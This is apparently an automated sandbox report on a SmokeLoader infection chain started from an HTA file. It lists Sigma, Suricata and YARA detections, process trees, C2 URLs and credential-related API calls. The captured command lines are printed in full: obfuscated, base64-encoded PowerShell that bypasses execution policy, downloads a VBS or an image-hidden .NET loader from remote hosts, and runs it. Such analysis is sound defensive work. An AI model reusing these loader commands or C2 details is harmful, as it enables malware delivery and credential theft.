vYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFT

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", ProcessId: 6588, ProcessName: csc.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\djvbaae, CommandLine: C:\Users\user\AppData\Roaming\djvbaae, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\djvbaae, NewProcessName: C:\Users\user\AppData\Roaming\djvbaae, OriginalFileName: C:\Users\user\AppData\Roaming\djvbaae, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\djvbaae, ProcessId: 3052, ProcessName: djvbaae

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5592, TargetFilename: C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , ProcessId: 6964, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5592, TargetFilename: C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", CommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0c

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", ProcessId: 6588, ProcessName: csc.exe

Suricata Signatures

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:37:26.824559+0100	2049038	1	A Network Trojan was detected	142.215.209.78	443	192.168.2.4	49731	TCP

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:38:09.197379+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49781	46.173.214.24	80	TCP
2024-11-18T18:38:17.024024+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49817	46.173.214.24	80	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:37:18.758930+0100	2858795	1	A Network Trojan was detected	192.168.2.4	49730	107.172.44.178	80	TCP

ETPRO MALWARE SmokeLoader encrypted module (3)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:38:09.370502+0100	2829848	2	Potentially Bad Traffic	46.173.214.24	80	192.168.2.4	49781	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://prolinice.ga/index.php	Avira URL Cloud: Label: malware
Source: http://vilendar.ga/index.php	Avira URL Cloud: Label: malware
Source: http://prolinice.ga:80/index.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}

Multi AV Scanner detection for submitted file

Source: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D63098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,	17_2_02D63098
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D63717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,	17_2_02D63717
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D63E04 RtlCompareMemory,CryptUnprotectData,	17_2_02D63E04
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D6123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,	17_2_02D6123B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D611E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,	17_2_02D611E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D61198 CryptBinaryToStringA,CryptBinaryToStringA,	17_2_02D61198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D61FCE CryptUnprotectData,RtlMoveMemory,	17_2_02D61FCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_006626AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	19_2_006626AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_0304178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	20_2_0304178C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_0304118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	20_2_0304118D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_0032263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	22_2_0032263E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_0032245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	22_2_0032245E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_00322404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	22_2_00322404
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_02D52799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	27_2_02D52799
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_02D525A4 CryptBinaryToStringA,CryptBinaryToStringA,	27_2_02D525A4

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta, type: SAMPLE

Source: unknown

HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1827828745.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105130224.00000000049D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinked
Source:	Binary string: aspnet_compiler.pdb source: djvbaae, 0000000F.00000000.2357331428.0000000000192000.00000002.00000001.01000000.0000000C.sdmp, djvbaae.14.dr
